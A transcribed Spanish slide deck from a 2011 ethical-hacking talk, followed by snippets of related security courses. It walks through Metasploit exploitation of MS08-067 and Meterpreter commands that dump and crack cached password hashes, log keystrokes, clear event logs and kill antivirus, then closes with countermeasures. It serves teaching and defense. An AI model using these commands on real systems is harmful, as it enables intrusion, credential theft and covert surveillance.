Lima, 24 Setiembre, 2011
|
|
- Elisa Morales Castellanos
- hace 8 años
- Vistas:
Transcripción
1 Lima, 24 Setiembre, 2011
2 AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades 7 Pentesting 8 Prevención y contramedidas Omar Palomino omarc320@gmail.com 2
3 1 Acerca del autor 10 años de experiencia en seguridad de información Psicólogo que aun no comienza sus estudios. Maestrista de Ing. de Computación y Sistemas Consultor en Seguridad de información, CEH Escritor en mis tiempos libres: Omar Palomino omarc320@gmail.com 3
4 2 Introducción al Ethical Hacking Ethical Hacking = Hacker bueno Prevención de ataques mal intencionados. Análisis de vulnerabilidades preventivos Cumplimientos de normas: NTP, ISO Uso de metodologías: OSSMT, OWASP, etc Cumplimiento de la legislación peruana Omar Palomino omarc320@hotmail.com 4
5 3 Ethical Hacking vs Pentesting Omar Palomino 5
6 3 Ethical Hacking vs Pentesting Omar Palomino 6
7 4 Escaneo de red organizacional Uso de herramientas: Nmap: La herramienta por excelencia. Tracert: Examina las rutas de llegada Consulta a los DNS ( Consúltale a Google Tools: * Maltego (veamos un ejemplo) Omar Palomino omarc320@gmail.com 7
8 4 Escaneo de red organizacional NMAP: Root# nmap sv O T3 PN F <target> Omar Palomino omarc320@gmail.com 8
9 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan SYN SYN / ACK ACK Nmap reconoce que hay una conexión abierta: Bingo Omar Palomino omarc320@gmail.com 9
10 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan SYN SYN / ACK ACK Nmap NO reconoce que hay una conexión abierta Omar Palomino omarc320@gmail.com 10
11 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan Root# nmap ss v <target> SYN SYN / ACK RST Nmap reconoce que hay una conexión abierta: BINGO! Omar Palomino omarc320@gmail.com 11
12 4 Escaneo de red organizacional NMAP Avanzado: Técnicas evasivas de IPS/IDS - F: Fragmentar paquetes - sf: FIN Scan (Stealth Scan) Omar Palomino omarc320@gmail.com 12
13 4 Escaneo de red organizacional: Ing. Social Llamadas telefónicas Piggybacking Escritorios limpios Dumpster diving Phishing Redes Sociales MALTEGO Omar Palomino 13
14 4 Escaneo de red organizacional: Ing. Social Omar Palomino 14
15 5 Análisis de Vulnerabilidades Nessus Qualys Acunetix Vulnerabilidades en S.O y Aplicaciones Shadow Security Scanner Bactrack Omar Palomino omarc320@gmail.com 15
16 5 Análisis de Vulnerabilidades Nessus Omar Palomino 16
17 6 Explotación de Vulnerabilidades Metasploit msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp payload => windows/vncinject/bind_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST RHOST => msf exploit(ms08_067_netapi) > exploit Omar Palomino 17
18 6 Explotación de Vulnerabilidades Metasploit Omar Palomino 18
19 6 Explotación de Vulnerabilidades Armitage Omar Palomino 19
20 6 Explotación de Vulnerabilidades Armitage Meterpreter: Familia de plugins avanzados de los mismos creadores de Metasploit Framework, que se utiliza sobre sistemas comprometidos y tienen como característica fundamental que todo es cargado en memoria sin crear ningún proceso adicional ni dejar rastros PS IDLETIME SYSINFO Omar Palomino omarc320@gmail.com 20
21 6 Explotación de Vulnerabilidades Armitage PS IDLETIME SYSINFO HASHDUMP Omar Palomino 21
22 6 Explotación de Vulnerabilidades Rainbow Tables Almacenamiento contraseñas Windows: LN Hash/NTLM Hash por defecto SUPERPASSWORD SUPERPA SSWORD e52cac67419a9a224a3b108f3fa6cb6d e52cac67419a9a22 4a3b108f3fa6cb6d Omar Palomino 22
23 6 Explotación de Vulnerabilidades Rainbow Tables Omar Palomino 23
24 6 Explotación de Vulnerabilidades Rainbow Tables Almacenamiento contraseñas del Active Directory Meterpreter> mkdir C:\cache Meterpreter> upload /root/cache C:\cache Meterpreter> cd C:\cache Meterpreter> ls C:\cachedump.exe > salida.txt Meterpreter> download salida.txt --wordlist:password.lst -format:mscash salida.txt Loaded 2 password hashes with 2 different salts (M$ Cache Hash [Generic 1x]) password (mpalomino) superpassword (opalomino) Omar Palomino omarc320@gmail.com 24
25 6 Explotación de Vulnerabilidades Armitage Con Metasploit (y con Armitage) podemos realizar sniffing de dos tipos: SNIFFING Interfaces de red TECLADO Meterpreter> ps Meterpreter> migrate 1736 Meterpreter> getpid Meterpreter> keyscan_start Meterpreter> keyscan_dump Meterpreter> keyscan_stop Omar Palomino 25
26 6 Explotación de Vulnerabilidades Armitage Screenshot Webcam Clearev Run get_application_list Winenum Download Run enum_shares Excute f cmd.exe i -t Run killav Run service_maneger -l Omar Palomino omarc320@gmail.com 26
27 6 Explotación de Vulnerabilidades Vistumbler Android: Wifiscan, Wigle Wifi Antena: Chipset Realtek o Atheros Vulnerabilidades en REDES INALAMBRICAS: Encontrar vulnerables: Cifrado WEP Filtrado MAC Wardriving redes Airmon Omar Palomino omarc320@gmail.com 27
28 6 Explotación de Vulnerabilidades Más de 30 redes vulnerables! Omar Palomino 28
29 6 Explotación de Vulnerabilidades Más de 20 redes vulnerables! Omar Palomino 29
30 6 Explotación de Vulnerabilidades AndroidScreenCast:./adb kill-server./adb star-server Requerimientos para auditoría wireless: Chipset Realtek, Atheros Antena con potencia Diversas herramientas: airmon Omar Palomino 30
31 6 Explotación de Vulnerabilidades Vulnerabilidades en la RED: Encontrar información importante viajando en la red. Contraseñas Conversaciones Acceso a segmentos de red no autorizado. Ettercap Wireshark Cain y Abel SSLTrip Metasploit Airmon Omar Palomino omarc320@gmail.com 31
32 8 Prevención y contramedidas El único sistema seguro es aquél que está apagado en el interior de un bloque de hormigón protegido en una habitación sellada y rodeada por guardias armados. Eric Raymond La Seguridad no es solo un proceso Tecnológico Es un proceso Organizacional Omar Palomino omarc320@gmail.com 32
33 8 Prevención y contramedidas FACTOR TÉCNICO * Firewall capa 3 * Firewall de aplicaciones * Firewall de Bases de datos * IPS/IDS * Correlación de eventos. FACTOR HUMANO * Campañas de concientización * Pruebas de ingeniería social * Charlas y reuniones. SISTEMA DE GESTIÓN * Sistema de Gestión de seguridad de información (SGSI) * ISO /17799 * Gestión de Riesgos (ISO 27005) * ITIL, COBIT Omar Palomino omarc320@gmail.com 33
34 Lima, 24 Setiembre, 2011
AGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades
OMARC320@GMAIL.COM AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades
Más detallesDejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com
Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador
Más detallesInstalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.
Actividad 4. Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción Scan a computer. GFI Languard:
Más detallesMetasploit Framework
Metasploit Framework ÍNDICE 1. Introducción al exploiting 2. Metasploit Framework What is? Arquitectura Módulos Adición módulos Entorno de usuario y automatización 3. Metasploit as a User Interfaces Comandos
Más detallesDejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com
Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador
Más detallesMetasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita.
Ethical Hacking en modo Gráfico Herramientas para hacking ético hay muchas, las profesionales o pagas ofrecen informes mucho más detallados que las no pagas, pero ambas nos dan un indicio de que es lo
Más detallesSECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a la familia de Sistemas
Más detallesPresentación. Porqué formarte con nosotros?
Presentación Un Hacker Ético es un profesional dotado de habilidades para encontrar las debilidades o vulnerabilidades en los sistemas utilizando el mismo conocimiento y herramientas que un hacker malicioso,
Más detallesHacking ético y Seguridad en Red
TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...
Más detallesQué es un pentest? Es un método para evaluar la seguridad de un ordenador o una red de ordenadores simulando un ataque externo o interno no autorizado
Qué es un pentest? Es un método para evaluar la seguridad de un ordenador o una red de ordenadores simulando un ataque externo o interno no autorizado Qué implica? Un análisis activo del sistema en busca
Más detallesHacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo
Hacking Ético Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Objetivos Detectar sistemas vivos en la red. Descubrir servicios que se están ejecutando o que están escuchando en
Más detalles- Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.
Test de Intrusión: Test de Intrusión, también llamado a veces hacking ético es una evaluación activa de las medidas de seguridad de la información. En los entornos de red complejos actuales, la exposición
Más detallesAnonimato en la web. Anonimato en la web: Proyecto TOR + SQLMap. Omar Palomino. omarc320@gmail.com. http://www.el-palomo.com.
Anonimato en la web Anonimato en la web: Proyecto TOR + SQLMap Abril, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+, ITIL v3. Consultor
Más detallesArCERT Jornadas de Seguridad Informática 2009
ArCERT Jornadas de Seguridad Informática 2009 La Web desde el ojo de un atacante Nahuel Grisolía ngrisolia@cybsec.com 02 de Octubre de 2009 Buenos Aires - Argentina Agenda Agenda Introducción - Intereses
Más detallesTEMARIO. Introducción o Las evaluaciones de seguridad o El hacker ético o Metodología de ataque o Entregables o Bibliografía
TEMARIO Introducción o Las evaluaciones de seguridad o El hacker ético o Metodología de ataque o Entregables o Bibliografía Fundamentos de seguridad de la información o Conceptos y definiciones o Fuga
Más detallesAnexo 2. Realización de los escenarios de ataque
Anexo 2 Realización de los escenarios de ataque 1. Requisitos para el ataque Para la elaboración de los ataques se trabajó con los siguientes elementos: Archivos ejecutables de Slacker y Timestomp, conextensión.exe.
Más detallesTema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión
Tema 6 SSI T. intrusión Tipos Metodologías Fases Tema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión Seguridad en Sistemas Informáticos Noviembre-2012 Tema 6 SSI Contenido
Más detallesDiplomado. Duriva www.duriva.com [Escriba texto] Página 0
2015 Diplomado Duriva www.duriva.com [Escriba texto] Página 0 La realidad dicta que en la actualidad las organizaciones deben contemplar la evaluación de la seguridad de sus sistemas. De esta forma es
Más detallesUniversidad Nacional de La Matanza Escuela Internacional de Informática
Universidad Nacional de La Matanza Escuela Internacional de Informática Curso 02 Días: de lunes 20 a viernes 24 de Octubre Horario: de 8:30 a 12:30 hs. Horas totales del curso: 20 con evaluación Cantidad
Más detallesINTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS
INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes
Más detallesHacking ético. Módulo III Hacking del sistema
Hacking ético Módulo III Hacking del sistema Tipos de Ataques a Passwords Ataque por diccionario Ataque por fuerza bruta Ataque híbrido Ingeniería Social Shoulder surfing 2 Hashes: Autenticación en Windows
Más detallesMetaSploit, tomar control de equipos remotos
MetaSploit, tomar control de equipos remotos MetaSploit es una suite o conjunto de programas en realidad. Está diseñada para explotar las vulnerabilidades de los equipos y es sin duda el programa más usado
Más detallesSession Hijacking: Secuestro de sesiones en aplicaciones web empresariales
Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com
Más detalles100% Laboratorios en Vivo
100% Laboratorios en Vivo Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de
Más detallesCURSO DE ETHICAL HACKING
1. OBJETIVOS DEL CURSO 1.1. OBJETIVO GENERAL CURSO DE ETHICAL HACKING Brindar a los participantes los conocimientos, técnicas y habilidades utilizadas por hackers para realizar ataques informáticos. 1.2.
Más detallesConstrucción de un Firewall para redes industriales con NetFPGA
Construcción de un Firewall para redes industriales con NetFPGA Jhon Jairo Padilla Aguilar, PhD. Sergio Garcia Richard Ardila Universidad Pontificia Bolivariana-Bucaramanga Las redes de producción industrial
Más detallesSISTEMAS Y HACKING ÉTICO
2015 Programa de Extensión para Profesionales PLANA DOCENTE El programa cuenta con la participación de reconocidos profesionales con amplia experiencia académica y laboral, entre los que podemos destacar:
Más detallesEmpezando con Wmap. @luisco100
Empezando con Wmap @luisco100 El objetivo de este tutorial es dar a conocer lo pasos necesarios para utilizar la herramienta de escaneo de vulnerabilidades en sitios web Wmap. Primero que todo un reconocimiento
Más detallesInternal Hacking y contramedidas en entorno Windows Pirateo interno, medidas de protección, desarrollo de herramientas
Introducción 1. Preámbulo 15 2. Desciframiento de un ataque conseguido 17 3. Descifrado de contramedidas eficaces 18 3.1 Análisis de riesgos reales 18 3.2 Consideraciones técnicas 19 3.3 Consideraciones
Más detallesProtección y Seguridad de la Información (junio 2009)
Protección y Seguridad de la Información (junio 2009) Nombre.: 1.- DVL a) Distribución GNU/Linux que aglutina las principales herramientas en ataque orientada a la realización de auditorías de seguridad
Más detallesCertified Ethical Hacker (CEH) v8
Certified Ethical Hacker (CEH) v8 Curso que ofrece a los asistentes los contenidos y habilidades necesarios para analizar la seguridad de los sistemas de seguridad. El curso cubrirá los conceptos de escaneo,
Más detallesIDENTIFICACIÓN DE VULNERABILIDADES Y PRUEBAS DE PENETRACIÓN EN REDES
IDENTIFICACIÓN DE VULNERABILIDADES Y PRUEBAS DE PENETRACIÓN EN REDES Alejandro Hernández H. (nitrøus), CISSP, GPEN http://twitter.com/nitr0usmx http://chatsubo-labs.blogspot.com http://www.brainoverflow.org
Más detallesEscalar de un Dominio a otro
Escalar de un Dominio a otro 1.- Introducción: El presente artículo describe una técnica que podría utilizar un pentester para tomar control de más de un dominio en una empresa, identificando las relaciones
Más detallesTALLER AUDITORIA Y PENTEST 2012
Taller auditoria y pentest 2012 por Bernabé Muñoz Mogrobejo se encuentra bajo una Licencia Creative Commons Reconocimiento-NoComercial-CompartirIgual 3.0 Unported. Pág 1 PRÓLOGO Ya ha pasado casi más de
Más detallesHacking Ético & Seguridad Ofensiva
Hacking Ético & Seguridad Ofensiva INDICE DATOS DEL CURSO OBJETIVOS DEL CURSO CONTENIDO MATERIALES Y RECURSOS DEL CURSO EVALUACION DATOS DEL CURSO Duración: 6 Jornadas (30horas), (08:00 am a 13:00 pm)
Más detallesInicio. junio 2016. Plana Docente. Dirigido a. Jean del Carpio Foronda - Perú. Alexis Torres Pardo - Perú
Inicio junio 2016 Las empresas requieren verificar si sus redes están seguras de cualquier ataque. Para ello, es necesario someter la red a una serie de pruebas para verificar su total seguridad. Usando
Más detallesCatalogo cursos de Seguridad Informática
Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las
Más detallesSchool of Hacking. Taller 3: Herramientas básicas del hacker: Metasploit y Armitage
School of Hacking Taller 3: Herramientas básicas del hacker: Metasploit y Armitage Antonio Díaz Díaz & José José Antonio Gómez, 2015 2015 Índice Metasploit Framework (José Antonio Gómez) Terminología Msfconsole:
Más detallesinfo.uruguay@isec-global.com 4342-4685 4342-2079 4342-5440 www.isec-global.com
thical Ethical La permanente exposición al riesgo de robo, extravío, alteración o delitos sobre la información confidencial de las empresas, las sitúa en una posición bastante delicada y critica, por lo
Más detallesEl Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec
Metodología. www.dsteamseguridad.com La Metodología de la charla esta guiada por el concepto de cada una de las fases de ataque, con su respectiva demostración Arquitectura de Red (Laboratorio Virtual)
Más detallesESPECIALISTA EN SEGURIDAD INFORMÁTICA Y TELECOMUNICACIONES
JOSÉ ALBERTO ÁVALOS VÉLEZ Calzada de Tlalpan #1522 Col. Miravalle Del.Benito Juárez C.P. 02580 Edo. Civil: Soltero Cel. 5536998925 recados: 62377587 Edad: 34 Años alberto.avalos@comunidad.unam.mx ESPECIALISTA
Más detallesMan In The Middle con Ettercap
1 de 10 01/12/2007 2:02 Man In The Middle con Ettercap MITM - Man In The Middle - Envenenamiento ARP - ARP spoofing - ARP poisoning, En este tutorial se explica cómo esnifar una red o un equipo en concreto
Más detallesTaller Hacking for Forensics
Taller Hacking for Forensics Duración 48 horas Objetivo general: - El participante podrá adquirir habilidades para aplicar diversas técnicas analíticas y científicas en materia de Hackeo y Análisis Forense
Más detallesSeguridad en redes Tareas de Reconocimiento
Seguridad en redes Tareas de Reconocimiento Félix Molina Ángel molina@uagro.mx Tareas de reconocimiento Objetivo: Utilizar técnicas y herramientas básicas para obtener información esencial acerca de sitios
Más detallesCertified Offensive and Defensive Security Professional - Entrenamiento E-learning - 3-SCANNING. www.dsteamseguridad.com
3-SCANNING NETWORK MAPPING. El proceso de Network Mapping, consiste en tratar de identificar la arquitectura (Topología) de la red a la cual vamos a realizarle las pruebas de seguridad y auditoria a nivel
Más detalles3-ANÁLISIS DE VULNERABILIDADES
3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna
Más detallesAuditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L.
Auditorías de Seguridad: revisión como método de prevención Vicente Aguilera Díaz Internet Security Auditors, S.L. CONTENIDO 1. Protección de la información 2. Auditorías de seguridad 3. Implantación de
Más detallesSeguridad Informática: Test de intrusión
Seguridad Informática: Test de intrusión Jesús Moreno León j.morenol@gmail.com Septiembre 2010 Estas diapositias son una obra derivada del artículo Test de intrusión de Chema Alonso y de los seminarios
Más detallesCERTIFICACIÓN THD-EPC
Propuesta: CERTIFICACIÓN THD-EPC Ethical Pentester Certified Febrero 8 de 2015 Las partes se comprometen a mantener la confidencialidad absoluta con respecto a la información contenida en el presente documento.
Más detallesACADEMIA CISCO - ESPOL. Ethical Hacking
Ethical Hacking OBJETIVOS En este curso se introduce a los estudiantes a los conceptos básicos del hacking y su aplicación a fin de encontrar vulnerabilidades en una red corporativa. Los estudiantes entenderán
Más detallesLa herramienta nmap. Nmap. Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez. La herramienta nmap. Dr.
Cárdenas Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez Lámina 1 Nmap Lámina 2 1 Cárdenas Matrix y nmap Lámina 3 Características Nmap NMAP Network Security Scanner Herramienta
Más detallesHacking Ético: Cacería de Vulnerabilidades OWASP LATAM TOUR 2015
Hacking Ético: Cacería de Vulnerabilidades OWASP LATAM TOUR 2015 About Me Ingeniero de Sistemas (UNEXPO). Especialista en Auditoria de Sistemas Financieros y Seguridad de Datos. Certificado CEHv8 (EC-COUNCIL).
Más detallesCriptografía y Seguridad en Redes de Comunicaciones Profesor: Álvaro Alesanco Iglesias (revisado 12-05-2010)
Seguridad en Redes de Comunicaciones Criptografía y Seguridad en Redes de Comunicaciones Profesor: Álvaro Alesanco Iglesias (revisado 12-05-2010) 1 Objetivos Se pretende que la práctica sea una demostración
Más detallesUTILIZANDO METERPRETER CONTRA MAQUINAS WINDOWS
UTILIZANDO METERPRETER CONTRA MAQUINAS WINDOWS Meterpreter es una impresionante utilidad que permite obtener una gran cantidad de información sobre un objetivo comprometido, así como también manipular
Más detallesNMAP. Fundamentos de Auditoria: Software de Auditoria Seguridad informática
NMAP Nmap se define como una suite de herramientas de descubrimiento de redes de código abierto, ha sido utilizada desde hace mucho tiempo en procesos de auditorías de seguridad ya que la misma permite
Más detallesHacking en 5 pasos usando Software libre
Hacking en 5 pasos usando Ponente: JUAN DAVID BERRIO LOPEZ judabe2003@gmail.com Ingeniero en Informática. Especialista en redes Universidad san Buenaventura Posgrado en Seguridad Redes UOC, CCNSP Cyberoam/India
Más detallesApartado: Brutalix Versión: 3 Título: Monitorización redes. nmap Fecha: 15/06/07
*PRÓPOSITO. Conocer como monitorizar una red con el programa Nmap. *CONDICIONES INICIALES. Ordenador con capacidad de arranque desde CDROM. *MATERIAL ASOCIADO. Disponer del live-cd 1 de la distribución
Más detallesSeguridad & Hacking Actualización: Octubre 2013
Seguridad & Hacking Actualización: Octubre 2013 Introducción El objetivo principal es compartir información. En un inicio, era seguro. Sin embargo, los accesos remotos e Internet han cambiado esto. Los
Más detallesProtección de su Red
Protección de su Red Ing. Teofilo Homsany Gerente General SOLUTECSA PaiBlla Mall, Local 45. Telefono: +507.209.4997 E mail: ventas@solucionesdetecnologia.com Áreas vulnerables de su red Gateway (entrada
Más detallesPresentación del curso Presencial
Presentación del curso Presencial Seguridad Informática y Hacking Ético Módulo I Tabla de contenido Presentación del curso... 3 Objetivos de aprendizaje... 5 Contenidos del curso... 6 Competencias previas...
Más detallesAtaques de lado Cliente (Client-Side Attacks)
Ataques de lado Cliente (Client-Side Attacks) Mauricio Velazco, OSEH Consultor mvelazco@open-sec.com http://ehopen-sec.blogspot.com/ Dont learn to hack, hack to learn Por qué OpenSec? Unica empresa Peruana
Más detallesHACKING Y SEGURIDAD INFORMATICA EN DEBIAN GNU/LINUX
Y SEGURIDAD DEBIAN Msc(c). Felipe Andrés Corredor Chavarro Ingeniero de Sistemas : Especialista en Soluciones Telemáticas felipe@esdebian.org - Tel: (8)6616800 ext. 124 Fax: (8)6616800 ext. 141 Universidad
Más detallesUniversidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web
Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas Laboratorio de Seguridad en aplicaciones web Practica 2: Configuración de VPN y escaneo de puertos. Objetivos: En esta práctica
Más detallesDIPLOMADO EN GESTION IT - SEGURIDAD Y CONTINUIDAD UNIVERSIDAD SEK 2014
DIPLOMADO EN GESTION IT - SEGURIDAD Y CONTINUIDAD UNIVERSIDAD SEK 2014 1. UNIDAD ORGANIZADORA Facultad de Ingeniería y Administración 2. NOMBRE DEL PROGRAMA Diplomado en Gestión IT Seguridad y Continuidad
Más detallesCertified Ethical Hacker Training
Pág. 1 de 6 CONTENIDO DETALLADO Certified Ethical Hacker Training Descripción del Curso El Hacker Ético es la persona que lleva a cabo intentos de intrusión en redes y/o sistemas utilizando los mismos
Más detallesPenetration Test Metodologías & Usos
Penetration Test Metodologías & Usos Lic. Luis Ramírez lramirez@cybsec.com 18 de Noviembre de 2009 Asunción, n, Paraguay Agenda Introducción Seguridad Informática en los Sistemas Objetivos, Tipos y Alcances
Más detallesDIPLOMADO DIPLOMADO SEGURIDAD DE DE LA LA INFORMACIÓN
DIPLOMADO DIPLOMADO SEGURIDAD DE DE LA LA INFORMACIÓN SEGURIDAD DE LA INFORMACIÓN Escuela de Informática y Telecomunicaciones Hoy en día, los profesionales del área informática requieren una sólida formación
Más detallesCURSO DE REDES INALÁMBRICAS WIFI SEGURAS
CURSO DE REDES INALÁMBRICAS WIFI SEGURAS Brindar extensos conocimientos sobre la tecnología WIFI y sus estándares Explicar la manera adecuada y profesional de seleccionar los Puntos de Acceso y dispositivos
Más detallesDESCRIPCIÓN DEL PROGRAMA TÉCNICO EN SEGURIDAD INFORMÁTICA
DESCRIPCIÓN DEL PROGRAMA TÉCNICO EN SEGURIDAD INFORMÁTICA La Auditoría de las Tecnologías de la Información y las Comunicaciones adquiere cada vez mayor importancia, debido a la necesidad de garantizar
Más detallesATAQUES DE MONITORIZACION Seguridad Informática
ATAQUES DE MONITORIZACION Seguridad Informática por Alberto Medina Mazuelos Profesor Rodrigo Tapia Santis Tecnologías de la Información y Comunicación Ingeniería en Informática Universidad Tecnológica
Más detallesGestión de Seguridad en canales electrónicos. Ing. Jorge O Higgins, CISSP
Gestión de Seguridad en canales electrónicos Ing. Jorge O Higgins, CISSP Contenido 1. Objetivos de seguridad en el ambiente financiero 2. Definición de requerimientos de seguridad 3. Seguridad como proceso
Más detallesEEHC. Enhacke Ethical Hacking Certification
EEHC Enhacke Ethical Hacking Certification Curso de Certificación de Hacking Ético ENHACKE S.A.C. Año 2010 ENHACKE ETHICAL HACKING CERTIFICATION EEHC INTRODUCCION El curso EEHC provee el conocimiento necesario
Más detalleshttp://www.villacorp.com Pentesting con Android Ing. Javier Villanueva
http://www.villacorp.com Pentesting con Android Ing. Javier Villanueva Quién Soy? Ing. Javier Villanueva Consultor, Investigador e Instructor Independiente en Seguridad Ofensiva ( Hacking Ético ) Director
Más detallesCURSO DE CAPACITACION ETHICAL HACKING CERTIFIED PROFESSIONAL
CURSO DE CAPACITACION ETHICAL HACKING CERTIFIED PROFESSIONAL TEMARIO ETHICAL HACKING CERTIFIED PROFESSIONAL Introducción al Ethical Hacking - Amenazas a la seguridad de la información y vectores de ataque
Más detallesEpisodio de Pentesting
Episodio de Pentesting Hello world, I m backtrack Nicolás Moral de Aguilar Seguridad en tecnologías de la información Índice 1. Planteamiento del episodio 2. Conceptos necesarios 3. Configuración del escenario
Más detallesCAPITULO 14 SEGURIDAD EN LA RED
CAPITULO 14 SEGURIDAD EN LA RED Seguridad en la red La palabra seguridad de acuerdo con el Diccionario American Heritage es sinónimo de garantía y garantizar. Según el diccionario de la Real Academia seguridad
Más detallesPRESENTACIÓN CORPORATIVA
PRESENTACIÓN CORPORATIVA xavier.vigue@innevis.com Abril de 2012 INNEVIS is a trademark of Indiseg Evolium Group, S.L. PRESENTACIÓN EMPRESA LA FUSIÓN INNEVIS, es la marca comercial de la corporación Indiseg
Más detallesFEDERACIÓN COLOMBIANA DE MUNICIPIOS- DIRECCIÓN NACIONAL SIMIT
FEDERACIÓN COLOMBIANA DE MUNICIPIOS- DIRECCIÓN NACIONAL SIMIT Formato No. 1 PROPUESTA ECONÓMICA Prestar a la Federación Colombiana de Municipios - Dirección Nacional Simit, sus servicios de consultoría,
Más detallesPRUEBAS DE PENETRACIÓN PARA PRINCIPIANTES: 5 HERRAMIENTAS PARA EMPEZAR
Published on Revista.Seguridad (https://revista.seguridad.unam.mx) Inicio > Pruebas de penetración para principiantes: 5 herramientas para empezar PRUEBAS DE PENETRACIÓN PARA PRINCIPIANTES: 5 HERRAMIENTAS
Más detalles..::[Manual Basico Metasploit]::..
..::[Manual Basico Metasploit]::.. Creador TheJez 1) Conceptos Basicos 2) Modalidades 3) Comienzos 4) Exploits 5) Actualizar 1. Conceptos Basicos. Para empezar a hablar del metasploit, lo definiremos como
Más detallesProceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS
Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Julio 2005 Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas
Más detallesTUTORIAL: Cómo hacer más segura nuestra red MAC OS X
TUTORIAL: Cómo hacer más segura nuestra red MAC OS X TABLA DE CONTENIDOS INTRODUCCIÓN 3 CAMBIAR CONTRASEÑA 4 FILTRAR EL ACCESO POR MAC 5 CIFRADO WEP O WPA 6 DESACTIVAR EL BROADCASTING SSID 6 DESACTIVAR
Más detallesEscaneo de servidor FTP Búsqueda de vulnerabilidades
Escaneo de servidor FTP Búsqueda de vulnerabilidades David Núñez Álvarez PSI 2011/2012 Con motivo de no revelar los datos del servidor al que se le realizó el estudio vamos a suponer que su dominio es
Más detalles: COMPUTACIÓN E INFORMATICA : Ingeniería de Redes y Comunicaciones : Técnicas de Hacking : Z-RED109
I. DATOS INFORMATIVOS Carrera Especialidad Curso Código Ciclo : Sexto Requisitos Duración Horas Semana : 08 horas Versión : v.0109 II. SUMILLA: : COMPUTACIÓN E INFORMATICA : Ingeniería de Redes y Comunicaciones
Más detallesChristian Martorella - Vicente Díaz Edge-security Fist Conference April 2007
Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007 Indice Introducción a la seguridad de DB Motores de Bases de Datos Ataques internos Ataques externos Conclusiones Introducción
Más detallesCURSO MASTER HACKING: SECURITY EXPERT v9.0 TEMARIO BÁSICO. Versión estándar disponible en http://www.villacorp.com/doc/temario-curso-hack.
1 http://www.villacorp.com CURSO MASTER HACKING: SECURITY EXPERT v9.0 TEMARIO BÁSICO Versión estándar disponible en http://www.villacorp.com/doc/temario-curso-hack.pdf Ante el explosivo crecimiento de
Más detallesHacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo
Hacking Ético Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Escaneo Después de Obtener la información inicial y de localizar el rango de la red. Averiguar qué máquinas están activas.
